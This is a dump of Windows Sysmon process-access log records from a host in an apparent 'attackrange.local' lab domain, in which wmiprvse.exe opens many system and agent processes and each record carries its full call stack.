15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022163Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022162Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 